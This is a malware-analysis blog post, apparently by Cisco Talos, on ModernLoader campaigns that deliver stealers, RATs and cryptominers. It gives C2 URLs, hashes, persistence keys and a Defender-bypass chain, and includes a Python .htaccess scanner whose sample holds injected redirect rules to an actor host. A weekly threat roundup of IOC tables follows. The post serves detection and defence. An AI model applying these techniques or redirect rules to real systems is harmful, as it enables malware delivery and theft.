Although the original IP address here is mistyped, the similarity to the newest C2 IP address is strong enough to link these campaigns.

Droppers (vs_community.exe theme)

The internal name of many droppers is vs_community.exe, which is likely intended to convince users that the files are part of the Visual Studio Community edition. Most of the droppers are created with the 7-Zip SFX Constructor tool and the version information strings are likely kept the same for all of the dropper files created in the campaign.

Payload modules received from the C2 server

No.go
hxxp:[//]31[.]41[.]244[.]231/0xNANA/no[.]go is the first URL we discovered when investigating anomalous daily PowerShell invocations. Like the Loader module, it consists of the amsi.dll module with the ability to disable the AMSI interface, the payload to be loaded into RegSvcs.exe and the payload injector module friday.dll.

Since we already know how the process injection is implemented, we can focus on the payload. The payload is auto.exe (142c333bef9eab4ce9d324e177572423c845ee399c01b4b78cfff730b4cb79b4), another downloading stage. The stage creates a randomly named VB script and a randomly named installation information .inf file, which is opened using cmstp.exe (Connection Manager Profile Installer). The .inf file instructs the system to launch the VB script.

This somewhat convoluted execution of VB script is a likely attempt to circumvent the Windows User Account Control (UAC). The VB script is very similar to other VB scripts in the campaign and it simply attempts to download and execute PowerShell code from two URLs hosted on the C2 server.
A randomly named VBS file is stored in the resource section of the auto.exe module.

Unfortunately, the two modules DEKL.go and ya.go were not accessible at the time of analysis, and it seems they were not accessible during the observed attack either. Nevertheless, the observed attack chain continues with the request to download and execute the next module, which is Nana.go, from hxxp[://]31[.]41[.]244[.]231/0xNANA/file/NANA[.]go.

VB scripts employed in these campaigns contain the text that also exists in Emotet macro downloaders. It is not clear if they are an artifact of a code generator or they are taken from another source to make the detection of the script more difficult by randomizing some of the content. Although the comments contain grammatically correct sentences, they have very little meaning and may have been generated by something akin to the Markov Chain sentence generator.
Nana.go
During the observed attack, the Nana.go module is downloaded and executed with the filename 0xNax.exe. The module checksum is 4621924ff1b05ad7c15bc4b5dad68f7c8c3eceaf7824444b149264eff79d4b9a and it is packed with UPX. The internal file version information claims the file is a Microsoft Visual Studio Community installer; the vs_community.exe theme appears in multiple files of the campaign and suggests the files may be spread on file sharing websites and P2P networks. The dropped file names in the campaign seem to be chosen to appear as legitimate Windows utilities.

Once unpacked, the module is a self-extracting 7-Zip file created with the 7-Zip SFX Constructor utility. The utility allows the user to add multiple files from a single folder to the 7-Zip archive with a stub that interprets a configuration data stored encrypted within the self-extracting file. The configuration data contains various instructions to the extractor stub, similar to a scripting engine. The scripting engine allows the user to specify where the file will be extracted and which commands should be run during the extraction process.

The Constructor utility seems to be targeted to Eastern European users with predefined script templates in Bulgarian, Polish, Hungarian and Russian.

7-Zip SFX Constructor script editor.

The 7-Zip SFX files are used throughout the campaign and nana.go is just one of them. When executed, it will drop and launch two additional modules - C:\Users\<Username>\AppData\Roaming\Log\AppData.exe, 7e73bc53cd4e540e1d492e6fd8ff630354cd8a78134e99bc0b252eccb559c97a and C:\Users\<Username>\AppData\Roaming\Log\OneDrive.exe, eb37c756c60a75068bfe88addd24e209080fe5383d25c919ea40fe78fff98612.

AppData.exe is another self-extracting 7-Zip file with the internal filename vs_community.exe. When executed, it drops and runs the following files:
  • C:\Users\<Username>\AppData\Roaming\WinServer\Log.exe (3f2f84147c55e5fc42261ace15ad55239d0bcba31a9acd20b99c999efbb9d392)
  • C:\Users\<Username>\AppData\Roaming\WinServer\AppData.exe (d9c8e82c42e489ac7a484cb98fed40980d63952be9a88ff9538fc23f7d4eb27f)
The appdata.exe in the WinServer folder is identical to the already mentioned AUTORUNNN.exe, which sets the registry key to launch the infection process when the user logs into the system.

The module Log.exe drops and runs additional files:
  • C:\Users\<Username>\AppData\Roaming\UpdatersHelper\UpdatersHelper.exe (852857c66ee72f264c26d69c1f4092e99c2ed1fdcfef875f982fb75ed620ccc0). Internally the module name is BypassDefender. This seems to be a variant of the BypassDefender project whose source code is available on GitHub; its purpose is to disable Windows Defender by stopping its service and the associated processes.
  • C:\Users\<Username>\AppData\Roaming\UpdatersHelper\UpdatersHelper.bat (435aa8b19125d795ada322aa8e30f3dd9afa03a4ac1350177c920426d1b17a47). This is a batch file that creates a scheduled task to run the UpdatersHelper.exe executable module and sets its attributes to system and hidden so that it is not displayed in the default Windows Explorer view.
OneDrive module is an injector that injects a .NET loader into the process space of conhost.exe. The injected shellcode sets up the process for the next injection stage, which is a .NET assembly that drops and loads additional modules and starts a copy of XMRig to mine Monero using a pool on pool.hashvault.pro using the pool address 44Ds8fbC3HWQCcwQotgrNDUWnmDixpQPG7YLh5h2rzSMQrxCRXeSjQvH8LRPNGSyqvXcKeEk3umZ7T2wzFAgovF15UckBxg.
Xmrig's connection to a cryptomining pool.

Based on the observed traffic in the Hashvault dashboard, it seems that the number of infected systems using this particular pool is in the low hundreds, with relatively low mining yield. Looking at the geography, most of the connections are coming from Indonesia and other Asian countries, along with Eastern Europe.
OneDrive.exe miner pool hash rate in second half of June.

Before executing the miner, the loader will attempt to load a watchdog process as well as the kernel driver that allows the writing of memory in kernel mode. The watchdog process, sihost64.exe, ensures that the miner is restored if the miner file is deleted and its process is restarted if terminated.

Several other commands in the loader could disable Windows Update and Windows Defender.
Miner loader attempts to disable Windows update.

A scheduled task GoogleUpdateTaskMachineQC runs every time the user logs onto the system and launches the OneDrive.exe miner from C:\Users\<Username>\AppData\Roaming\OneDrive\OneDrive.exe.

The initial stub and the shellcode of the file is very similar to miners generated with a version of Silent Crypto Miner generator and the structure of the miner loader is also consistent with the loaders generated by the Silent Crypto Miner and SilentXMR projects.
Decompiled miner loader code.

Silent Crypto Miner loader source code.

Silent Crypto Miner is a generator that allows users with little knowledge of programming to create effective and resilient miner loaders.
Silent cryptocurrency miner builder form.
Meta, ww.cc and RegAsm.go
The PowerShell meta module is a loader that uses the similar three-assembly scheme to inject the payload beachy.exe into the process space of a newly created RegSvcs.exe process. Beachy.exe (b71c43bf7af23ed6a12bdb7ce96a4755b8a7f285b8aa802484e8b2dfa191f14e) is an obfuscated instance of the RedLine stealer using encrypted strings and legitimate class and function names to connect to the IP address 31[.]41[.]244[.]235:45692 as the C2 server.
Standard RedLine stealer authorization disguised as legitimate software.
RedLine URL module
Contrary to the URL name that serves this module, hxxp[://]31[.]41[.]244[.]231/0x/?0=RedLine, this module does not inject a variant of the RedLine stealer, but a variant of the ModernLoader bot (53b09a7c8bf41ed9015b8e3a98fb8b8581e82d17c1ead0bd0293f2e3e9996519).

As is the case with the original Loader module, the RedLine PowerShell script creates a new RegSvcs.exe hollowed process that launches the next stage of the injector that eventually moves the ModernLoader assembly client.exe into a newly created and hollowed svchost.exe process. This connects to the latest ModernLoader C2 script at hxxp[://]31[.]41[.]244[.]231/AVAVA/gate[.]php.

The RedLine module is usually downloaded by any of the standalone offer.exe executables (dc5255a5bcc89266ea0c7ca79f7a52ab281cbb6cc1980ee5b3a818114c01b93c), which also eventually downloads other modules to be executed:
  • hxxp[://]31[.]41[.]244[.]231/0xMine/RegAsm[.]go
  • hxxp[://]31[.]41[.]244[.]231/0xSocks/go[.]go - a simple script to download and launch socks.go module
  • hxxp[://]31[.]41[.]244[.]231/0xMine/go[.]go - a simple script to download and launch mine.go module
Mine.go
As opposed to the original and the RedLine loaders, the Mine.go and Socks.go modules are not PowerShell scripts but Windows PE executables that are downloaded and launched by the previous commands downloaded from hxxp[://]31[.]41[.]244[.]231/0xMine/go[.]go and hxxp[://]31[.]41[.]244[.]231/0xSocks/go[.]go respectively.

The embedded modules in resources (encrypted) are:

  • Sihost64 (watchdog): Ensures the miner is running, injected by runpe module loaded into conhost.exe.
  • Injector (RunPE.Run): Injects PE files in a process name specified as an argument to the function.
  • WR64.sys: Driver that may allow writing to kernel mode memory.
  • mr: XMRig executable for Monero mining.
  • th: ethminer.

Decompiled miner code.

The .NET miner loader is very similar to the code generated by the Silent cryptocurrency miner, as seen in the Nana.go OneDrive.exe miner.

The major difference between the two is in the folders used to drop additional components and the mining pool site used for mining. Mine.go is using pool.supportxmr.com on TCP port 3333 for mining and the address is the same: 44Ds8fbC3HWQCcwQotgrNDUWnmDixpQPG7YLh5h2rzSMQrxCRXeSjQvH8LRPNGSyqvXcKeEk3umZ7T2wzFAgovF15UckBxg.
Mines.go
The Mines.go module (21e72be7f818e2afd4d53ee8f16c7e4a4718a95dd75b90d83fa26181e426f578) is another miner, but this time, the actors chose to use the so-called "Sapphire Multi-Coin" miner that has been advertised for sale on various forums since at least February 2022. The module is observed to be downloaded by a small gos.go script, which is itself downloaded by one of the standalone downloaders (1c58274fbbeaf7178a478aea5e27b52d5ead7c66e24371a4089568fa6908818c).

The miner module copies itself into %LOCALAPPDATA%\OneDrive\OneDrive.exe and creates a scheduled task to run the OneDrive.exe every minute. The miner creates the mutex 39cb3ed9d64849789471d05f94b7b62a that checks if the module is already running in memory.
Sapphire miner advertisment.

The miner is written in Golang and it is a wrapper around the XMRig miner. Based on the configuration, which can be downloaded from a remote server, the golang portion of the miner loads the XMRig miner, sets the registry key to ensure the miner is loaded and prepares the required parameters to choose which crypto currency will be mined based on the amount of RAM on the infected system.

The miner loader will attempt to read the encrypted zip miner archive from the registry entry HKCU\SOFTWARE\Wow64\<SHA256_encrypted> (96cd98d42b896f6c92fd97b435d727497102ca91ce6e95252251a28e0c3fb9f8) if it exists. If it does not, the Sapphire loader will attempt to download it from the URL predefined in its configuration.

Based on the GPU type and the amount of RAM of the infected host, the Sapphire miner injects XMRig using process hollowing into the process space of a newly created svchost.exe or smartscreen.exe process.
The miner executable is downloaded and decrypted before being injected into a process.

The actual XMRig miner can be stored on the remote server, and in the case of the Mines.go module, the miner is downloaded from hxxp[://]31[.]41[.]244[.]231/0xMine/Temp[.]exe. The downloaded file is an AES-encrypted ZIP file that contains the XMRig miner and the WinRing0x64.sys helper driver. As above the XMRig is configured to use pool.supportxmr.com on TCP port 3333 with the same mining pool address.
Socks.go
The Socks.go module is an executable protected with Themida protector. The module contains a variant of the SystemBC back connect remote access Trojan with proxy functionality. The SystemBC connects to the same C2 IP address as the RedLine stealer module — 31[.]41[.]244[.]235 — but it uses TCP port 4440. SystemBC may allow the attacker to use the infected system as a proxy for their activities.
Autorun
The command to download and run the Autorun module by the ModernLoader bot is often observed together with the Meta module. The autorun downloads and runs the module autorunnn.exe, which sets a scheduled task to download and run the initial infection HTA application file hosted on the C2 server hxxp[://]31[.]41[.]244[.]231/0x?0=WindowsAnalyticsConfiguration. It also modifies a value in the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run so that the same mshta command is run when a user logs onto the system.
Hello.go
Hello.go module (3232126860f3729dda59f9db6476773997b4bcfb08e2e4b32b5214c30507d775), downloaded by at least one of the standalone downloaders (1c58274fbbeaf7178a478aea5e27b52d5ead7c66e24371a4089568fa6908818c), is a UPX-packed self-extracting 7-Zip dropper with the vs_community.exe internal name. It drops and runs a number of other modules, most of them focused on mining and some on bypassing Windows Defender. The module is similar to the nana.go payload, but contains more components. When the module is run, it drops the following files:

  • %APPDATA%\nexts\killduplicate.cmd
  • %APPDATA%\nexts\mine.exe - Silent Crypt miner
  • %APPDATA%\nexts\output.exe
  • %LOCALAPPDATA%\appdata.exe
  • %APPDATA%\winserv\killduplicate.cmd
  • %APPDATA%\winserv\appdata.exe
  • %APPDATA%\winserv\updatershelper.exe
  • %APPDATA%\install+\appdata.bat
  • %APPDATA%\install+\killduplicate.cmd
  • %APPDATA%\links\killduplicate.cmd
  • %APPDATA%\links\mine.exe
  • %APPDATA%\link\killduplicate.cmd
  • %APPDATA%\link\mine.exe
  • %APPDATA%\link\mines.exe
  • %APPDATA%\onedrive\onedrive.exe
  • %LOCALAPPDATA%\onedrive\onedrive.exe
  • %APPDATA%\drives\off.bat
  • %APPDATA%\drives\updatershelper.exe
  • %APPDATA%\google\libs\wr64.sys
The modules are focused on establishing an environment to mine crypto currency, with miners and auxiliary modules tasked with disabling Windows updates and Windows Defender.
Ws.go
Ws.go module (dd24e5596c318b30c05cffc7467f5649564ab93874c9201bf758a1a2ce05228c) is observed as downloaded and executed by one of the tasks launched by the C2 server to the ModernLoader.

Ws.go contains the already described PowerShell three-assembly module loader scheme which attempts to inject the module XBinder-Output.exe (40d68523748f6eaf765970a40458faccbe84ef5dff7acbdaf29ac5a69d7cae6f). XBinder-Output.exe contains a VB script WindowsConfiguration.vbs (c103c7686739669f3cfc123de34bdadb803c4ec8727cf12cd7cdc56be4bf60e1) in its resource section. The resource is encrypted and, when decrypted, is saved on the disk as %LOCALAPPDATA%\OneDrive\WindowsConfiguration.vbs and started.

The VB script is a wrapper for PowerShell code which attempts to download and run the initial ModernLoader loader module from hxxp[://]31[.]41[.]244[.]231/0x/Loader[.]go.
Ws.go drops and runs code to execute the initial ModernLoader loader.

XBinder-Output sets the registry value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WindowsConfiguration to point to the dropped WindowsConfiguration VB script so it is run every time the user logs onto the system.
SmartScreen.ps
SmartScreen.ps is downloaded by 1ddbf6cb9e4c92e93118d8f2ca98922195cf683926777b2c160f5d05d52f3fd5, which first loads a small script from hxxp[://]31[.]41[.]244[.]231/AVAVA/WAW/APPDATA/go.oo and eventually loads an instance of ModernLoader connecting to the same C2 URL, hxxp[://]31[.]41[.]244[.]231/AVAVA/gate[.]php.
Auto.oo
Auto.oo is an auxiliary module also downloaded by 1ddbf6cb9e4c92e93118d8f2ca98922195cf683926777b2c160f5d05d52f3fd5, and it launches an instance of SharpHide (881235fca4aeeb88950b952c0d9ce1a7d9a4eb838ce7d79447a26d2f45b1eaa5) which creates a hidden registry entry to start a copy of the SmartScreen Module every time the user logs onto the system.
XboxLive.ps
XboxLive.ps is downloaded by 1ddbf6cb9e4c92e93118d8f2ca98922195cf683926777b2c160f5d05d52f3fd5, which first downloads and runs a small script from hxxp[://]31[.]41[.]244[.]231/AVAVA/WAW/Documents/go.oo and eventually loads an instance of ModernLoader (09db213df3dbd950a8bc75246be72f5b572b00dbd3a5bba45c7074443d0928a7) into the process space of svchost.exe, configured to connect to the same C2 URL, hxxp[://]31[.]41[.]244[.]231/AVAVA/gate[.]php.

Each campaign has its own unique version name although the functionality of the loader is the same. The first loader version is "Live" while SmartScreen.ps and XBoxLive.ps each have their own version name which can presumably be tracked in the C2 server panel by the operator.
R0.go
This module has been spotted in the dynamic analysis of the 7-Zip self-extracting dropper 4a6ef2379195140aa31d339329ca06bd28589fa13fd88cfcf9d76cb2d4ab99c1. The module is a three assembly PowerShell which loads an obfuscated injector for a variant of the DcRAT (2c631588c491aa32c20f6a99201ba82982a31b1c763054562d59cd1a5a1ea14b).

The loader is first injected into the process space of RegSvcs.exe and then into the process space of a newly created svchost.exe process.

The DcRAT client is configured to connect to the IP address 31[.]41[.]244[.]235, just as the other RATs in this campaign. The TCP port to use is 8848. At the time of analysis, the host was not accessible.
Decrypted DcRAT configuration data.

Additional payloads

Discord Spreader
While searching for other modules communicating with C2 servers we spotted a file 838170edffbca1cadef3b7039330376c1aad914883103834c25e9bb92d9bfad1, purporting to be a copy of the µTorrent Web BitTorrent client. Once executed the file drops another randomly named file, which is a downloader written in Visual Basic with the code similar to other Offer.exe downloaders. The downloader, 9b347b48026f205733abbc24c502dfff5428341e10c6944687cdbfe70770f5f3, executes the following PowerShell command to download and run code from 62[.]204[.]41[.]71.
Discord Spreader module download.

The interesting thing about the dropper is that it is based on the Project Discord Spreader, an open-source module available on GitHub. The utility is a Discord token stealer which may be used to spread the original file on Discord by sending messages to channels where the user of the stolen Discord tokens is active. The spreader can also include a user-mode rootkit r77 or additional payloads in the assembly ManifestResource stream. A builder is available to create new instances of the spreader and the sample used in this campaign was obfuscated with .NET obfuscators.
The Discord Spreader builder.

The author also left a message in the code to "help" anti-malware researchers when analyzing the sample.
The message to analysts.
Amazon offer added to archives
This technique was observed on one of the infected systems in our telemetry. We observed the addition of a fake Amazon voucher named Amazon.com Gift Card 500 USD.gift.hta to archive files, such as RAR, 7-Zip and ZIP already present on the infected system. Each file's checksum is different, which indicates use of mild obfuscation to evade detection.

We were unable to retrieve those HTA files from the infected systems but found a related file on VirusTotal (5750d8d557fdcb6afb2d8cb52993fb07ac84a63aab0afc44efe30ffe08d48c2f), which contains code to communicate with 62[.]204[.]41[.]71 and whose filename is "Amazon Gift Card 500 USD.gift.vbs." The script first attempts to call PowerShell to download and run code from the URL hxxp://62[.]204[.]41[.]71/SPM/Spam.o and then opens the browser to a link created with the URL shortening service, hxxps://goo[.]su/DaqHw, which leads to a page offering the user an alleged free Amazon gift card worth $500 USD.
PHP scripts
The actor seems to be interested in compromising vulnerable web applications and changing their configuration so that malicious PHP scripts serve malicious content to the users of the compromised application.

One particular file, artadd.php (9704fa1a8242643f66572e7ee68e4e7d7bec9e7054319b8551fed4b3b0ccdd45), has been found in a few instances of compromised WordPress and cPanel applications. The file is obfuscated with a very simple obfuscation scheme and it eventually executes the code to download additional components futer.php (a249c275b0ad384ae1906d2ec169f77abce9d712ab8470eb5fe7040a71948026) and .htaccess (f013d15d2203ec6a90be789d4b58c99ca7e42d9beedb9c4c0b05f599e2eb0ea0) from 62[.]204[.]41[.]192.
PHP script on compromised apps downloads additional components.

The function of the .htaccess file is in this case to configure redirects to the futer.php if the browser accesses any files on the site with the extensions .zip, .exe or .rar. If the extension in the request matches the above, futer.php will execute code that retrieves a file from the actor's command and control (C2) server and serve that instead of the requested executable.
PHP file attempts to replace a requested file with a malicious file from the C2 server.
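Web administrators can look for this pattern in their own .htaccess files without knowing the specific script name. The following added example (not Talos' code, and not the actor's .htaccess, which we did not reproduce) scans an .htaccess for RewriteRule or RedirectMatch directives that route requests for archive or executable extensions to a PHP script, taking preceding RewriteCond lines into account, since a WordPress-style rule usually carries the extension test there. The .htaccess text is constructed to mirror the behaviour described for futer.php; the redirect target host is written defanged, as on this page.

```python
"""Flag .htaccess rules that hand archive/executable downloads to a PHP script.

Added example, not Talos' code; the .htaccess text is constructed.
"""
import re

DOWNLOAD_EXT = re.compile(r"\b(zip|exe|rar|7z|msi)\b", re.I)
PHP_TARGET = re.compile(r"\.php\b", re.I)
REDIRECT_STATUS = {"permanent", "temp", "seeother", "gone"}


def _strip_comment(line: str) -> str:
    return line.split("#", 1)[0].strip()


def suspicious_rules(htaccess_text: str):
    """Return (lineno, directive, pattern, target) for rules whose pattern, or
    any RewriteCond immediately preceding it, names a download extension and
    whose target is a PHP script."""
    hits = []
    pending_conds = []   # CondPatterns seen since the last RewriteRule
    for n, raw in enumerate(htaccess_text.splitlines(), 1):
        parts = _strip_comment(raw).split()
        if not parts:
            continue
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            pending_conds.append(parts[2])
            continue
        if directive == "rewriterule" and len(parts) >= 3:
            pattern, target = parts[1], parts[2]
            ext_sources = [pattern] + pending_conds
            pending_conds = []
        elif directive == "redirectmatch":
            # Optional status argument: "RedirectMatch 302 <regex> <url>"
            idx = 2 if len(parts) > 1 and (parts[1].isdigit() or parts[1].lower() in REDIRECT_STATUS) else 1
            if len(parts) < idx + 2:
                continue
            pattern, target = parts[idx], parts[idx + 1]
            ext_sources = [pattern]
        else:
            continue
        if PHP_TARGET.search(target) and any(DOWNLOAD_EXT.search(s) for s in ext_sources):
            hits.append((n, parts[0], pattern, target))
    return hits


# Constructed .htaccess: a normal WordPress block followed by two injected rules.
SAMPLE_HTACCESS = r"""
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
# END WordPress
RewriteCond %{REQUEST_URI} \.(zip|exe|rar)$ [NC]
RewriteRule ^(.*)$ /futer.php?f=$1 [L]
RedirectMatch 302 (?i)\.(exe|rar)$ http://62[.]204[.]41[.]192/futer.php
"""

if __name__ == "__main__":
    for lineno, directive, pattern, target in suspicious_rules(SAMPLE_HTACCESS):
        print(f"line {lineno}: {directive} {pattern} -> {target}")
```

The stock WordPress rules pass because their targets are index.php with no extension test, or have no PHP target at all; the two injected rules are reported, with the RewriteCond carrying the extension test for the first. Checking the .htaccess alongside a file-integrity baseline catches the swap before a visitor's "update" download is served from the C2.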

Summary

This post represents the most notable portions of three campaigns we discovered in June. These campaigns portray an actor experimenting with different technology. The usage of ready-made tools shows that the actor understands the TTPs required for a successful malware campaign, but their technical skills are not developed enough to build their own tools. Relying on off-the-shelf tools also improves the group's operational security: there are no obvious signs of who is behind the attacks, except that they likely speak Russian.
The most recent ModernLoader campaign modules.

The actor is frequently using open-source components and code generators to achieve its goals. A number of remote access tools, stealers and cryptominers are used in the campaigns to eventually reap financial benefits for the actor. The actor has an interest in alternative distribution channels such as compromised web applications, archive infections and spreading by using Discord webhooks. Despite all the techniques and tactics used we estimate that the success of these campaigns is limited. Cisco Talos continues to monitor all available sources for signs of similar campaigns.

Coverage

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort SIDs are applicable to this threat: 60437-60440

Orbital Queries

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here.

Indicators of Compromise

Indicators of Compromise associated with this threat can be found here.

Threat Roundup for August 19 to August 26

26 August 2022 at 19:37

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 19 and Aug. 26. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
Win.Virus.Ramnit-9964077-0 | Virus | Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It also steals browser cookies and attempts to hide from popular antivirus software.
Win.Virus.Xpiro-9964080-1 | Virus | Expiro is a known file infector and information-stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Dropper.Cerber-9964300-0 | Dropper | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns, other file extensions are used.
Win.Worm.Kuluoz-9964104-0 | Worm | Kuluoz, sometimes known as "Asprox," is a modular remote access trojan that is also known to download and execute follow-on malware, such as fake antivirus software. Kuluoz is often delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations.
Win.Dropper.HawkEye-9964231-0 | Dropper | HawkEye is an information-stealing malware that specifically targets usernames and passwords stored by web browsers and mail clients on an infected machine. It is commonly spread via email and can propagate through removable media.
Win.Dropper.Formbook-9964246-0 | Dropper | Formbook is an information stealer that attempts to collect sensitive information from an infected machine by logging keystrokes, stealing saved web browser credentials, and monitoring information copied to the clipboard.
Win.Dropper.Remcos-9964868-1 | Dropper | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.XtremeRAT-9964479-0 | Dropper | XtremeRAT is a remote access trojan active since 2010 that allows the attacker to eavesdrop on users and modify the running system. The source code for XtremeRAT, written in Delphi, was leaked online and has since been used by similar RATs.
Win.Packed.Shiz-9964480-0 | Packed | Shiz is a remote access trojan that allows an attacker to access an infected machine to harvest sensitive information. It is commonly spread via droppers or by visiting a malicious site.

Threat Breakdown

Win.Virus.Ramnit-9964077-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 18 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER (Value Name: AntiVirusOverride) 18
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER (Value Name: AntiVirusDisableNotify) 18
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER (Value Name: FirewallDisableNotify) 18
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER (Value Name: FirewallOverride) 18
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER (Value Name: UpdatesDisableNotify) 18
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER (Value Name: UacDisableNotify) 18
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM (Value Name: EnableLUA) 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE (Value Name: EnableFirewall) 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE (Value Name: DoNotAllowExceptions) 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE (Value Name: DisableNotifications) 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC (Value Name: Start) 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND (Value Name: Start) 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC (Value Name: Start) 18
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION (Value Name: jfghdug_ooetvtgk) 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV (Value Name: Start) 18
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: Windows Defender) 18
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON (Value Name: Userinit) 18
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON (Value Name: Userinit) 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: JudCsgdy) 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND 1
Mutexes Occurrences
{7930D12C-1D38-EB63-89CF-4C8161B79ED4} 18
{79345B6A-421F-2958-EA08-07396ADB9E27} 17
{7930D12D-1D38-EB63-89CF-4C8161B79ED4} 16
{7930CC18-1D38-EB63-89CF-4C8161B79ED4} 16
{7930DB19-1D38-EB63-89CF-4C8161B79ED4} 16
{<random GUID>} 16
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
46[.]165[.]254[.]201 18
72[.]26[.]218[.]70 18
195[.]201[.]179[.]207 18
208[.]100[.]26[.]245 18
206[.]191[.]152[.]58 18
142[.]250[.]72[.]110 18
64[.]225[.]91[.]73 18
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
google[.]com 18
testetst[.]ru 18
iihsmkek[.]com 18
mtsoexdphaqliva[.]com 18
uulwwmawqjujuuprpp[.]com 18
twuybywnrlqcf[.]com 18
wcqqjiixqutt[.]com 18
ubgjsqkad[.]com 18
tlmmcvqvearpxq[.]com 18
flkheyxtcedehipox[.]com 18
edirhtuawurxlobk[.]com 18
tfjcwlxcjoviuvtr[.]com 18
Files and or directories created Occurrences
%LOCALAPPDATA%\bolpidti 18
%LOCALAPPDATA%\bolpidti\judcsgdy.exe 18
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\judcsgdy.exe 18
%TEMP%\squhapjc.exe 16
%TEMP%\aacwxnxw.exe 16
%ProgramData%\qvqdlyny.log 16
%LOCALAPPDATA%\yjghhxdl.log 16
%LOCALAPPDATA%\aanqrsjf.log 14
\TEMP\tFXd2E8YU 1
%LOCALAPPDATA%\bolpidti\pxBC6E.tmp 1
\TEMP\5ETGN6snq 1
\TEMP\zYyccBVe 1
%LOCALAPPDATA%\bolpidti\pxBE23.tmp 1
%LOCALAPPDATA%\bolpidti\pxACA6.tmp 1
%LOCALAPPDATA%\bolpidti\pxB5DA.tmp 1
\TEMP\cjTnE8Jr 1
\TEMP\o2gKdKfQ 1
\TEMP\o192e68 1
\TEMP\QYnhH23 1
\TEMP\lgxG4A4 1
\TEMP\YWj2Vj1 1
\TEMP\5nPK0vwsR 1
%LOCALAPPDATA%\bolpidti\pxBDC6.tmp 1
